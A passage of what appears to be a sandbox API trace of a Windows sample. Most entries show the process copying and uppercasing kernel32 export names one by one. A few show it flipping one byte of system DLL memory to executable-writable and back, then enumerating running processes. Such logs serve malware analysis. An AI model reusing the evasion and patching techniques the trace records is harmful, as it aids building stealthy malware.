lpString1="DeleteVolumeMountPointA") returned="DeleteVolumeMountPointA" [0158.101] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTA") returned 23 [0158.101] lstrcpyA (in: lpString1=0x239f180, lpString2="DeleteVolumeMountPointW" | out: lpString1="DeleteVolumeMountPointW") returned="DeleteVolumeMountPointW" [0158.101] lstrlenA (lpString="DELETEVOLUMEMOUNTPOINTW") returned 23 [0158.101] lstrcpyA (in: lpString1=0x239f180, lpString2="DeviceIoControl" | out: lpString1="DeviceIoControl") returned="DeviceIoControl" [0158.101] lstrlenA (lpString="DEVICEIOCONTROL") returned 15 [0158.101] lstrcpyA (in: lpString1=0x239f180, lpString2="DisableThreadLibraryCalls" | out: lpString1="DisableThreadLibraryCalls") returned="DisableThreadLibraryCalls" [0158.101] lstrlenA (lpString="DISABLETHREADLIBRARYCALLS") returned 25 [0158.101] lstrcpyA (in: lpString1=0x239f180, lpString2="DisableThreadProfiling" | out: lpString1="DisableThreadProfiling") returned="DisableThreadProfiling" [0158.101] lstrlenA (lpString="DISABLETHREADPROFILING") returned 22 [0158.101] lstrcpyA (in: lpString1=0x239f180, lpString2="DisassociateCurrentThreadFromCallback" | out: lpString1="DisassociateCurrentThreadFromCallback") returned="DisassociateCurrentThreadFromCallback" [0158.101] lstrlenA (lpString="DISASSOCIATECURRENTTHREADFROMCALLBACK") returned 37 [0158.101] lstrcpyA (in: lpString1=0x239f180, lpString2="DisconnectNamedPipe" | out: lpString1="DisconnectNamedPipe") returned="DisconnectNamedPipe" [0158.101] lstrlenA (lpString="DISCONNECTNAMEDPIPE") returned 19 [0158.101] lstrcpyA (in: lpString1=0x239f180, lpString2="DnsHostnameToComputerNameA" | out: lpString1="DnsHostnameToComputerNameA") returned="DnsHostnameToComputerNameA" [0158.101] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEA") returned 26 [0158.101] lstrcpyA (in: lpString1=0x239f180, lpString2="DnsHostnameToComputerNameW" | out: lpString1="DnsHostnameToComputerNameW") returned="DnsHostnameToComputerNameW" [0158.101] lstrlenA (lpString="DNSHOSTNAMETOCOMPUTERNAMEW") returned 26 [0158.101] lstrcpyA (in: lpString1=0x239f180, lpString2="DosDateTimeToFileTime" | out: lpString1="DosDateTimeToFileTime") returned="DosDateTimeToFileTime" [0158.101] lstrlenA (lpString="DOSDATETIMETOFILETIME") returned 21 [0158.101] lstrcpyA (in: lpString1=0x239f180, lpString2="DosPathToSessionPathA" | out: lpString1="DosPathToSessionPathA") returned="DosPathToSessionPathA" [0158.101] lstrlenA (lpString="DOSPATHTOSESSIONPATHA") returned 21 [0158.101] lstrcpyA (in: lpString1=0x239f180, lpString2="DosPathToSessionPathW" | out: lpString1="DosPathToSessionPathW") returned="DosPathToSessionPathW" [0158.101] lstrlenA (lpString="DOSPATHTOSESSIONPATHW") returned 21 [0158.102] lstrcpyA (in: lpString1=0x239f180, lpString2="DuplicateConsoleHandle" | out: lpString1="DuplicateConsoleHandle") returned="DuplicateConsoleHandle" [0158.102] lstrlenA (lpString="DUPLICATECONSOLEHANDLE") returned 22 [0158.102] lstrcpyA (in: lpString1=0x239f180, lpString2="DuplicateHandle" | out: lpString1="DuplicateHandle") returned="DuplicateHandle" [0158.102] lstrlenA (lpString="DUPLICATEHANDLE") returned 15 [0158.102] lstrcpyA (in: lpString1=0x239f180, lpString2="EnableThreadProfiling" | out: lpString1="EnableThreadProfiling") returned="EnableThreadProfiling" [0158.102] lstrlenA (lpString="ENABLETHREADPROFILING") returned 21 [0158.102] lstrcpyA (in: lpString1=0x239f180, lpString2="EncodePointer" | out: lpString1="EncodePointer") returned="EncodePointer" [0158.102] lstrlenA (lpString="ENCODEPOINTER") returned 13 [0158.102] lstrcpyA (in: lpString1=0x239f180, lpString2="EncodeSystemPointer" | out: lpString1="EncodeSystemPointer") returned="EncodeSystemPointer" [0158.102] lstrlenA (lpString="ENCODESYSTEMPOINTER") returned 19 [0158.102] lstrcpyA (in: lpString1=0x239f180, lpString2="EndUpdateResourceA" | out: lpString1="EndUpdateResourceA") returned="EndUpdateResourceA" [0158.102] lstrlenA (lpString="ENDUPDATERESOURCEA") returned 18 [0158.102] lstrcpyA (in: lpString1=0x239f180, lpString2="EndUpdateResourceW" | out: lpString1="EndUpdateResourceW") returned="EndUpdateResourceW" [0158.102] lstrlenA (lpString="ENDUPDATERESOURCEW") returned 18 [0158.102] lstrcpyA (in: lpString1=0x239f180, lpString2="EnterCriticalSection" | out: lpString1="EnterCriticalSection") returned="EnterCriticalSection" [0158.102] lstrlenA (lpString="ENTERCRITICALSECTION") returned 20 [0158.102] lstrcpyA (in: lpString1=0x239f180, lpString2="EnumCalendarInfoA" | out: lpString1="EnumCalendarInfoA") returned="EnumCalendarInfoA" [0158.102] lstrlenA (lpString="ENUMCALENDARINFOA") returned 17 [0158.102] lstrcpyA (in: lpString1=0x239f180, lpString2="EnumCalendarInfoExA" | out: lpString1="EnumCalendarInfoExA") returned="EnumCalendarInfoExA" [0158.102] lstrlenA (lpString="ENUMCALENDARINFOEXA") returned 19 [0158.102] lstrcpyA (in: lpString1=0x239f180, lpString2="EnumCalendarInfoExEx" | out: lpString1="EnumCalendarInfoExEx") returned="EnumCalendarInfoExEx" [0158.102] lstrlenA (lpString="ENUMCALENDARINFOEXEX") returned 20 [0158.102] lstrcpyA (in: lpString1=0x239f180, lpString2="EnumCalendarInfoExW" | out: lpString1="EnumCalendarInfoExW") returned="EnumCalendarInfoExW" [0158.102] lstrlenA (lpString="ENUMCALENDARINFOEXW") returned 19 [0158.102] lstrcpyA (in: lpString1=0x239f180, lpString2="EnumCalendarInfoW" | out: lpString1="EnumCalendarInfoW") returned="EnumCalendarInfoW" [0158.102] lstrlenA (lpString="ENUMCALENDARINFOW") returned 17 [0158.102] lstrcpyA (in: lpString1=0x239f180, lpString2="EnumDateFormatsA" | out: lpString1="EnumDateFormatsA") returned="EnumDateFormatsA" [0158.102] lstrlenA (lpString="ENUMDATEFORMATSA") returned 16 [0158.102] lstrcpyA (in: lpString1=0x239f180, lpString2="EnumDateFormatsExA" | out: lpString1="EnumDateFormatsExA") returned="EnumDateFormatsExA" [0158.102] lstrlenA (lpString="ENUMDATEFORMATSEXA") returned 18 [0158.102] lstrcpyA (in: lpString1=0x239f180, lpString2="EnumDateFormatsExEx" | out: lpString1="EnumDateFormatsExEx") returned="EnumDateFormatsExEx" [0158.102] lstrlenA (lpString="ENUMDATEFORMATSEXEX") returned 19 [0158.102] lstrcpyA (in: lpString1=0x239f180, lpString2="EnumDateFormatsExW" | out: lpString1="EnumDateFormatsExW") returned="EnumDateFormatsExW" [0158.102] lstrlenA (lpString="ENUMDATEFORMATSEXW") returned 18 [0158.103] lstrcpyA (in: lpString1=0x239f180, lpString2="EnumDateFormatsW" | out: lpString1="EnumDateFormatsW") returned="EnumDateFormatsW" [0158.107] VirtualProtect (in: lpAddress=0x776bf7ea, dwSize=0x1, flNewProtect=0x40, lpflOldProtect=0x239fe48 | out: lpflOldProtect=0x239fe48*=0x20) returned 1 [0158.107] VirtualProtect (in: lpAddress=0x776bf7ea, dwSize=0x1, flNewProtect=0x20, lpflOldProtect=0x239fe4c | out: lpflOldProtect=0x239fe4c*=0x40) returned 1 [0158.190] VirtualFree (lpAddress=0x90000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.191] VirtualFree (lpAddress=0x70000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0158.194] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x4c [0158.197] Process32FirstW (in: hSnapshot=0x4c, lppe=0x239fc5c | out: lppe=0x239fc5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0158.198] Process32NextW (in: hSnapshot=0x4c, lppe=0x239fc5c | out: lppe=0x239fc5c*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x42, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0158.198] GetLastError () returned 0x0 [0158.198] lstrlenA (lpString="kernel32.dll") returned 12 [0158.198] GetModuleHandleA (lpModuleName="kernel32.dll") returned 0x77110000 [0158.198] lstrcpyA (in: lpString1=0x239efd4, lpString2="AcquireSRWLockExclusive" | out: lpString1="AcquireSRWLockExclusive") returned="AcquireSRWLockExclusive" [0158.198] lstrlenA (lpString="ACQUIRESRWLOCKEXCLUSIVE") returned 23 [0158.198] lstrcpyA (in: lpString1=0x239efd4, lpString2="AcquireSRWLockShared" | out: lpString1="AcquireSRWLockShared") returned="AcquireSRWLockShared" [0158.198] lstrlenA (lpString="ACQUIRESRWLOCKSHARED") returned 20 [0158.198] lstrcpyA (in: lpString1=0x239efd4, lpString2="ActivateActCtx" | out: lpString1="ActivateActCtx") returned="ActivateActCtx" [0158.198] lstrlenA (lpString="ACTIVATEACTCTX") returned 14 [0158.198] lstrcpyA (in: lpString1=0x239efd4, lpString2="AddAtomA" | out: lpString1="AddAtomA") returned="AddAtomA" [0158.198] lstrlenA (lpString="ADDATOMA") returned 8 [0158.198] lstrcpyA (in: lpString1=0x239efd4, lpString2="AddAtomW" | out: lpString1="AddAtomW") returned="AddAtomW" [0158.198] lstrlenA (lpString="ADDATOMW") returned 8 [0158.198] lstrcpyA (in: lpString1=0x239efd4, lpString2="AddConsoleAliasA" | out: lpString1="AddConsoleAliasA") returned="AddConsoleAliasA" [0158.198] lstrlenA (lpString="ADDCONSOLEALIASA") returned 16 [0158.198] lstrcpyA (in: lpString1=0x239efd4, lpString2="AddConsoleAliasW" | out: lpString1="AddConsoleAliasW") returned="AddConsoleAliasW" [0158.198] lstrlenA (lpString="ADDCONSOLEALIASW") returned 16 [0158.198] lstrcpyA (in: lpString1=0x239efd4, lpString2="AddIntegrityLabelToBoundaryDescriptor" | out: lpString1="AddIntegrityLabelToBoundaryDescriptor") returned="AddIntegrityLabelToBoundaryDescriptor" [0158.199] lstrlenA (lpString="ADDINTEGRITYLABELTOBOUNDARYDESCRIPTOR") returned 37 [0158.199] lstrcpyA (in: lpString1=0x239efd4, lpString2="AddLocalAlternateComputerNameA" | out: lpString1="AddLocalAlternateComputerNameA") returned="AddLocalAlternateComputerNameA" [0158.199] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEA") returned 30 [0158.199] lstrcpyA (in: lpString1=0x239efd4, lpString2="AddLocalAlternateComputerNameW" | out: lpString1="AddLocalAlternateComputerNameW") returned="AddLocalAlternateComputerNameW" [0158.199] lstrlenA (lpString="ADDLOCALALTERNATECOMPUTERNAMEW") returned 30 [0158.199] lstrcpyA (in: lpString1=0x239efd4, lpString2="AddRefActCtx" | out: lpString1="AddRefActCtx") returned="AddRefActCtx" [0158.199] lstrlenA (lpString="ADDREFACTCTX") returned 12 [0158.199] lstrcpyA (in: lpString1=0x239efd4, lpString2="AddSIDToBoundaryDescriptor" | out: lpString1="AddSIDToBoundaryDescriptor") returned="AddSIDToBoundaryDescriptor" [0158.199] lstrlenA (lpString="ADDSIDTOBOUNDARYDESCRIPTOR") returned 26 [0158.199] lstrcpyA (in: lpString1=0x239efd4, lpString2="AddSecureMemoryCacheCallback" | out: lpString1="AddSecureMemoryCacheCallback") returned="AddSecureMemoryCacheCallback" [0158.199] lstrlenA (lpString="ADDSECUREMEMORYCACHECALLBACK") returned 28 [0158.199] lstrcpyA (in: lpString1=0x239efd4, lpString2="AddVectoredContinueHandler" | out: lpString1="AddVectoredContinueHandler") returned="AddVectoredContinueHandler" [0158.199] lstrlenA (lpString="ADDVECTOREDCONTINUEHANDLER") returned 26 [0158.199] lstrcpyA (in: lpString1=0x239efd4, lpString2="AddVectoredExceptionHandler" | out: lpString1="AddVectoredExceptionHandler") returned="AddVectoredExceptionHandler" [0158.199] lstrlenA (lpString="ADDVECTOREDEXCEPTIONHANDLER") returned 27 [0158.199] lstrcpyA (in: lpString1=0x239efd4, lpString2="AdjustCalendarDate" | out: lpString1="AdjustCalendarDate") returned="AdjustCalendarDate" [0158.199] lstrlenA (lpString="ADJUSTCALENDARDATE") returned 18 [0158.199] lstrcpyA (in: lpString1=0x239efd4, lpString2="AllocConsole" | out: lpString1="AllocConsole") returned="AllocConsole" [0158.199] lstrlenA (lpString="ALLOCCONSOLE") returned 12 [0158.199] lstrcpyA (in: lpString1=0x239efd4, lpString2="AllocateUserPhysicalPages" | out: lpString1="AllocateUserPhysicalPages") returned="AllocateUserPhysicalPages" [0158.199] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGES") returned 25 [0158.199] lstrcpyA (in: lpString1=0x239efd4, lpString2="AllocateUserPhysicalPagesNuma" | out: lpString1="AllocateUserPhysicalPagesNuma") returned="AllocateUserPhysicalPagesNuma" [0158.199] lstrlenA (lpString="ALLOCATEUSERPHYSICALPAGESNUMA") returned 29 [0158.199] lstrcpyA (in: lpString1=0x239efd4, lpString2="ApplicationRecoveryFinished" | out: lpString1="ApplicationRecoveryFinished") returned="ApplicationRecoveryFinished" [0158.199] lstrlenA (lpString="APPLICATIONRECOVERYFINISHED") returned 27 [0158.199] lstrcpyA (in: lpString1=0x239efd4, lpString2="ApplicationRecoveryInProgress" | out: lpString1="ApplicationRecoveryInProgress") returned="ApplicationRecoveryInProgress" [0158.199] lstrlenA (lpString="APPLICATIONRECOVERYINPROGRESS") returned 29 [0158.199] lstrcpyA (in: lpString1=0x239efd4, lpString2="AreFileApisANSI" | out: lpString1="AreFileApisANSI") returned="AreFileApisANSI" [0158.199] lstrlenA (lpString="AREFILEAPISANSI") returned 15 [0158.199] lstrcpyA (in: lpString1=0x239efd4, lpString2="AssignProcessToJobObject" | out: lpString1="AssignProcessToJobObject") returned="AssignProcessToJobObject" [0158.199] lstrlenA (lpString="ASSIGNPROCESSTOJOBOBJECT") returned 24 [0158.199] lstrcpyA (in: lpString1=0x239efd4, lpString2="AttachConsole" | out: lpString1="AttachConsole") returned="AttachConsole" [0158.199] lstrlenA (lpString="ATTACHCONSOLE") returned 13 [0158.199] lstrcpyA (in: lpString1=0x239efd4, lpString2="BackupRead" | out: lpString1="BackupRead") returned="BackupRead" [0158.199] lstrlenA (lpString="BACKUPREAD") returned 10 [0158.199] lstrcpyA (in: lpString1=0x239efd4, lpString2="BackupSeek" | out: lpString1="BackupSeek") returned="BackupSeek" [0158.199] lstrlenA (lpString="BACKUPSEEK") returned 10 [0158.199] lstrcpyA (in: lpString1=0x239efd4, lpString2="BackupWrite" | out: lpString1="BackupWrite") returned="BackupWrite" [0158.200] lstrlenA (lpString="BACKUPWRITE") returned 11 [0158.200] lstrcpyA (in: lpString1=0x239efd4, lpString2="BaseCheckAppcompatCache" | out: lpString1="BaseCheckAppcompatCache") returned="BaseCheckAppcompatCache" [0158.200] lstrlenA (lpString="BASECHECKAPPCOMPATCACHE") returned 23 [0158.200] lstrcpyA (in: lpString1=0x239efd4, lpString2="BaseCheckAppcompatCacheEx" | out: lpString1="BaseCheckAppcompatCacheEx") returned="BaseCheckAppcompatCacheEx" [0158.200] lstrlenA (lpString="BASECHECKAPPCOMPATCACHEEX") returned 25 [0158.200] lstrcpyA (in: lpString1=0x239efd4, lpString2="BaseCheckRunApp" | out: lpString1="BaseCheckRunApp") returned="BaseCheckRunApp" [0158.200] lstrlenA (lpString="BASECHECKRUNAPP") returned 15 [0158.200] lstrcpyA (in: lpString1=0x239efd4, lpString2="BaseCleanupAppcompatCacheSupport" | out: lpString1="BaseCleanupAppcompatCacheSupport") returned="BaseCleanupAppcompatCacheSupport" [0158.200] lstrlenA (lpString="BASECLEANUPAPPCOMPATCACHESUPPORT") returned 32 [0158.200] lstrcpyA (in: lpString1=0x239efd4, lpString2="BaseDllReadWriteIniFile" | out: lpString1="BaseDllReadWriteIniFile") returned="BaseDllReadWriteIniFile" [0158.200] lstrlenA (lpString="BASEDLLREADWRITEINIFILE") returned 23 [0158.200] lstrcpyA (in: lpString1=0x239efd4, lpString2="BaseDumpAppcompatCache" | out: lpString1="BaseDumpAppcompatCache") returned="BaseDumpAppcompatCache" [0158.200] lstrlenA (lpString="BASEDUMPAPPCOMPATCACHE") returned 22 [0158.200] lstrcpyA (in: lpString1=0x239efd4, lpString2="BaseFlushAppcompatCache" | out: lpString1="BaseFlushAppcompatCache") returned="BaseFlushAppcompatCache" [0158.200] lstrlenA (lpString="BASEFLUSHAPPCOMPATCACHE") returned 23 [0158.200] lstrcpyA (in: lpString1=0x239efd4, lpString2="BaseFormatObjectAttributes" | out: lpString1="BaseFormatObjectAttributes") returned="BaseFormatObjectAttributes" [0158.200] lstrlenA (lpString="BASEFORMATOBJECTATTRIBUTES") returned 26 [0158.200] lstrcpyA (in: lpString1=0x239efd4, lpString2="BaseFormatTimeOut" | out: lpString1="BaseFormatTimeOut") returned="BaseFormatTimeOut" [0158.200] lstrlenA (lpString="BASEFORMATTIMEOUT") returned 17 [0158.200] lstrcpyA (in: lpString1=0x239efd4, lpString2="BaseGenerateAppCompatData" | out: lpString1="BaseGenerateAppCompatData") returned="BaseGenerateAppCompatData" [0158.200] lstrlenA (lpString="BASEGENERATEAPPCOMPATDATA") returned 25 [0158.200] lstrcpyA (in: lpString1=0x239efd4, lpString2="BaseGetNamedObjectDirectory" | out: lpString1="BaseGetNamedObjectDirectory") returned="BaseGetNamedObjectDirectory" [0158.200] lstrlenA (lpString="BASEGETNAMEDOBJECTDIRECTORY") returned 27 [0158.200] lstrcpyA (in: lpString1=0x239efd4, lpString2="BaseInitAppcompatCacheSupport" | out: lpString1="BaseInitAppcompatCacheSupport") returned="BaseInitAppcompatCacheSupport" [0158.200] lstrlenA (lpString="BASEINITAPPCOMPATCACHESUPPORT") returned 29 [0158.200] lstrcpyA (in: lpString1=0x239efd4, lpString2="BaseIsAppcompatInfrastructureDisabled" | out: lpString1="BaseIsAppcompatInfrastructureDisabled") returned="BaseIsAppcompatInfrastructureDisabled" [0158.200] lstrlenA (lpString="BASEISAPPCOMPATINFRASTRUCTUREDISABLED") returned 37 [0158.200] lstrcpyA (in: lpString1=0x239efd4, lpString2="BaseQueryModuleData" | out: lpString1="BaseQueryModuleData") returned="BaseQueryModuleData" [0158.200] lstrlenA (lpString="BASEQUERYMODULEDATA") returned 19 [0158.200] lstrcpyA (in: lpString1=0x239efd4, lpString2="BaseSetLastNTError" | out: lpString1="BaseSetLastNTError") returned="BaseSetLastNTError" [0158.200] lstrlenA (lpString="BASESETLASTNTERROR") returned 18 [0158.200] lstrcpyA (in: lpString1=0x239efd4, lpString2="BaseThreadInitThunk" | out: lpString1="BaseThreadInitThunk") returned="BaseThreadInitThunk" [0158.200] lstrlenA (lpString="BASETHREADINITTHUNK") returned 19 [0158.200] lstrcpyA (in: lpString1=0x239efd4, lpString2="BaseUpdateAppcompatCache" | out: lpString1="BaseUpdateAppcompatCache") returned="BaseUpdateAppcompatCache" [0158.200] lstrlenA (lpString="BASEUPDATEAPPCOMPATCACHE") returned 24 [0158.200] lstrcpyA (in: lpString1=0x239efd4, lpString2="BaseVerifyUnicodeString" | out: lpString1="BaseVerifyUnicodeString") returned="BaseVerifyUnicodeString" [0158.200] lstrlenA (lpString="BASEVERIFYUNICODESTRING") returned 23 [0158.201] lstrcpyA (in: lpString1=0x239efd4, lpString2="Basep8BitStringToDynamicUnicodeString" | out: lpString1="Basep8BitStringToDynamicUnicodeString") returned="Basep8BitStringToDynamicUnicodeString" [0158.201] lstrlenA (lpString="BASEP8BITSTRINGTODYNAMICUNICODESTRING") returned 37 [0158.201] lstrcpyA (in: lpString1=0x239efd4, lpString2="BasepAllocateActivationContextActivationBlock" | out: lpString1="BasepAllocateActivationContextActivationBlock") returned="BasepAllocateActivationContextActivationBlock" [0158.201] lstrlenA (lpString="BASEPALLOCATEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 45 [0158.201] lstrcpyA (in: lpString1=0x239efd4, lpString2="BasepAnsiStringToDynamicUnicodeString" | out: lpString1="BasepAnsiStringToDynamicUnicodeString") returned="BasepAnsiStringToDynamicUnicodeString" [0158.201] lstrlenA (lpString="BASEPANSISTRINGTODYNAMICUNICODESTRING") returned 37 [0158.201] lstrcpyA (in: lpString1=0x239efd4, lpString2="BasepCheckAppCompat" | out: lpString1="BasepCheckAppCompat") returned="BasepCheckAppCompat" [0158.201] lstrlenA (lpString="BASEPCHECKAPPCOMPAT") returned 19 [0158.201] lstrcpyA (in: lpString1=0x239efd4, lpString2="BasepCheckBadapp" | out: lpString1="BasepCheckBadapp") returned="BasepCheckBadapp" [0158.201] lstrlenA (lpString="BASEPCHECKBADAPP") returned 16 [0158.201] lstrcpyA (in: lpString1=0x239efd4, lpString2="BasepCheckWinSaferRestrictions" | out: lpString1="BasepCheckWinSaferRestrictions") returned="BasepCheckWinSaferRestrictions" [0158.201] lstrlenA (lpString="BASEPCHECKWINSAFERRESTRICTIONS") returned 30 [0158.201] lstrcpyA (in: lpString1=0x239efd4, lpString2="BasepFreeActivationContextActivationBlock" | out: lpString1="BasepFreeActivationContextActivationBlock") returned="BasepFreeActivationContextActivationBlock" [0158.201] lstrlenA (lpString="BASEPFREEACTIVATIONCONTEXTACTIVATIONBLOCK") returned 41 [0158.201] lstrcpyA (in: lpString1=0x239efd4, lpString2="BasepFreeAppCompatData" | out: lpString1="BasepFreeAppCompatData") returned="BasepFreeAppCompatData" [0158.201] lstrlenA (lpString="BASEPFREEAPPCOMPATDATA") returned 22 [0158.201] lstrcpyA (in: lpString1=0x239efd4, lpString2="BasepMapModuleHandle" | out: lpString1="BasepMapModuleHandle") returned="BasepMapModuleHandle" [0158.201] lstrlenA (lpString="BASEPMAPMODULEHANDLE") returned 20 [0158.201] lstrcpyA (in: lpString1=0x239efd4, lpString2="Beep" | out: lpString1="Beep") returned="Beep" [0158.201] lstrlenA (lpString="BEEP") returned 4 [0158.201] lstrcpyA (in: lpString1=0x239efd4, lpString2="BeginUpdateResourceA" | out: lpString1="BeginUpdateResourceA") returned="BeginUpdateResourceA" [0158.201] lstrlenA (lpString="BEGINUPDATERESOURCEA") returned 20 [0158.201] lstrcpyA (in: lpString1=0x239efd4, lpString2="BeginUpdateResourceW" | out: lpString1="BeginUpdateResourceW") returned="BeginUpdateResourceW" [0158.201] lstrlenA (lpString="BEGINUPDATERESOURCEW") returned 20 [0158.201] lstrcpyA (in: lpString1=0x239efd4, lpString2="BindIoCompletionCallback" | out: lpString1="BindIoCompletionCallback") returned="BindIoCompletionCallback" [0158.201] lstrlenA (lpString="BINDIOCOMPLETIONCALLBACK") returned 24 [0158.201] lstrcpyA (in: lpString1=0x239efd4, lpString2="BuildCommDCBA" | out: lpString1="BuildCommDCBA") returned="BuildCommDCBA" [0158.201] lstrlenA (lpString="BUILDCOMMDCBA") returned 13 [0158.201] lstrcpyA (in: lpString1=0x239efd4, lpString2="BuildCommDCBAndTimeoutsA" | out: lpString1="BuildCommDCBAndTimeoutsA") returned="BuildCommDCBAndTimeoutsA" [0158.201] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSA") returned 24 [0158.201] lstrcpyA (in: lpString1=0x239efd4, lpString2="BuildCommDCBAndTimeoutsW" | out: lpString1="BuildCommDCBAndTimeoutsW") returned="BuildCommDCBAndTimeoutsW" [0158.201] lstrlenA (lpString="BUILDCOMMDCBANDTIMEOUTSW") returned 24 [0158.201] lstrcpyA (in: lpString1=0x239efd4, lpString2="BuildCommDCBW" | out: lpString1="BuildCommDCBW") returned="BuildCommDCBW" [0158.201] lstrlenA (lpString="BUILDCOMMDCBW") returned 13 [0158.201] lstrcpyA (in: lpString1=0x239efd4, lpString2="CallNamedPipeA" | out: lpString1="CallNamedPipeA") returned="CallNamedPipeA" [0158.201] lstrlenA (lpString="CALLNAMEDPIPEA") returned 14 [0158.201] lstrcpyA (in: lpString1=0x239efd4, lpString2="CallNamedPipeW" | out: lpString1="CallNamedPipeW") returned="CallNamedPipeW" [0158.202] lstrlenA (lpString="CALLNAMEDPIPEW") returned 14 [0158.202] lstrcpyA (in: lpString1=0x239efd4, lpString2="CallbackMayRunLong" | out: lpString1="CallbackMayRunLong") returned="CallbackMayRunLong" [0158.202] lstrlenA (lpString="CALLBACKMAYRUNLONG") returned 18 [0158.202] lstrcpyA (in: lpString1=0x239efd4, lpString2="CancelDeviceWakeupRequest" | out: lpString1="CancelDeviceWakeupRequest") returned="CancelDeviceWakeupRequest" [0158.202] lstrlenA (lpString="CANCELDEVICEWAKEUPREQUEST") returned 25 [0158.202] lstrcpyA (in: lpString1=0x239efd4, lpString2="CancelIo" | out: lpString1="CancelIo") returned="CancelIo" [0158.202] lstrlenA (lpString="CANCELIO") returned 8 [0158.202] lstrcpyA (in: lpString1=0x239efd4, lpString2="CancelIoEx" | out: lpString1="CancelIoEx") returned="CancelIoEx" [0158.202] lstrlenA (lpString="CANCELIOEX") returned 10 [0158.202] lstrcpyA (in: lpString1=0x239efd4, lpString2="CancelSynchronousIo" | out: lpString1="CancelSynchronousIo") returned="CancelSynchronousIo" [0158.202] lstrlenA (lpString="CANCELSYNCHRONOUSIO") returned 19 [0158.202] lstrcpyA (in: lpString1=0x239efd4, lpString2="CancelThreadpoolIo" | out: lpString1="CancelThreadpoolIo") returned="CancelThreadpoolIo" [0158.202] lstrlenA (lpString="CANCELTHREADPOOLIO") returned 18 [0158.202] lstrcpyA (in: lpString1=0x239efd4, lpString2="CancelTimerQueueTimer" | out: lpString1="CancelTimerQueueTimer") returned="CancelTimerQueueTimer" [0158.202] lstrlenA (lpString="CANCELTIMERQUEUETIMER") returned 21 [0158.202] lstrcpyA (in: lpString1=0x239efd4, lpString2="CancelWaitableTimer" | out: lpString1="CancelWaitableTimer") returned="CancelWaitableTimer" [0158.202] lstrlenA (lpString="CANCELWAITABLETIMER") returned 19 [0158.202] lstrcpyA (in: lpString1=0x239efd4, lpString2="ChangeTimerQueueTimer" | out: lpString1="ChangeTimerQueueTimer") returned="ChangeTimerQueueTimer" [0158.202] lstrlenA (lpString="CHANGETIMERQUEUETIMER") returned 21 [0158.202] lstrcpyA (in: lpString1=0x239efd4, lpString2="CheckElevation" | out: lpString1="CheckElevation") returned="CheckElevation" [0158.202] lstrlenA (lpString="CHECKELEVATION") returned 14 [0158.202] lstrcpyA (in: lpString1=0x239efd4, lpString2="CheckElevationEnabled" | out: lpString1="CheckElevationEnabled") returned="CheckElevationEnabled" [0158.202] lstrlenA (lpString="CHECKELEVATIONENABLED") returned 21 [0158.202] lstrcpyA (in: lpString1=0x239efd4, lpString2="CheckForReadOnlyResource" | out: lpString1="CheckForReadOnlyResource") returned="CheckForReadOnlyResource" [0158.202] lstrlenA (lpString="CHECKFORREADONLYRESOURCE") returned 24 [0158.202] lstrcpyA (in: lpString1=0x239efd4, lpString2="CheckNameLegalDOS8Dot3A" | out: lpString1="CheckNameLegalDOS8Dot3A") returned="CheckNameLegalDOS8Dot3A" [0158.202] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3A") returned 23 [0158.202] lstrcpyA (in: lpString1=0x239efd4, lpString2="CheckNameLegalDOS8Dot3W" | out: lpString1="CheckNameLegalDOS8Dot3W") returned="CheckNameLegalDOS8Dot3W" [0158.202] lstrlenA (lpString="CHECKNAMELEGALDOS8DOT3W") returned 23 [0158.202] lstrcpyA (in: lpString1=0x239efd4, lpString2="CheckRemoteDebuggerPresent" | out: lpString1="CheckRemoteDebuggerPresent") returned="CheckRemoteDebuggerPresent" [0158.202] lstrlenA (lpString="CHECKREMOTEDEBUGGERPRESENT") returned 26 [0158.202] lstrcpyA (in: lpString1=0x239efd4, lpString2="ClearCommBreak" | out: lpString1="ClearCommBreak") returned="ClearCommBreak" [0158.202] lstrlenA (lpString="CLEARCOMMBREAK") returned 14 [0158.203] lstrcpyA (in: lpString1=0x239efd4, lpString2="ClearCommError" | out: lpString1="ClearCommError") returned="ClearCommError" [0158.203] lstrlenA (lpString="CLEARCOMMERROR") returned 14 [0158.203] lstrcpyA (in: lpString1=0x239efd4, lpString2="CloseConsoleHandle" | out: lpString1="CloseConsoleHandle") returned="CloseConsoleHandle" [0158.203] lstrlenA (lpString="CLOSECONSOLEHANDLE") returned 18 [0158.203] lstrcpyA (in: lpString1=0x239efd4, lpString2="CloseHandle" | out: lpString1="CloseHandle") returned="CloseHandle" [0158.203] lstrlenA (lpString="CLOSEHANDLE") returned 11 [0158.203] lstrcpyA (in: lpString1=0x239efd4, lpString2="ClosePrivateNamespace" | out: lpString1="ClosePrivateNamespace") returned="ClosePrivateNamespace" [0158.203] lstrlenA (lpString="CLOSEPRIVATENAMESPACE") returned 21 [0158.203] lstrcpyA (in: lpString1=0x239efd4, lpString2="CloseProfileUserMapping" | out: lpString1="CloseProfileUserMapping") returned="CloseProfileUserMapping" [0158.203] lstrlenA (lpString="CLOSEPROFILEUSERMAPPING") returned 23 [0158.203] lstrcpyA (in: lpString1=0x239efd4, lpString2="CloseThreadpool" | out: lpString1="CloseThreadpool") returned="CloseThreadpool" [0158.203] lstrlenA (lpString="CLOSETHREADPOOL") returned 15 [0158.203] lstrcpyA (in: lpString1=0x239efd4, lpString2="CloseThreadpoolCleanupGroup" | out: lpString1="CloseThreadpoolCleanupGroup") returned="CloseThreadpoolCleanupGroup" [0158.203] lstrlenA (lpString="CLOSETHREADPOOLCLEANUPGROUP") returned 27 [0158.203] lstrcpyA (in: lpString1=0x239efd4, lpString2="CloseThreadpoolCleanupGroupMembers" | out: lpString1="CloseThreadpoolCleanupGroupMembers") returned="CloseThreadpoolCleanupGroupMembers" [0158.203] lstrlenA 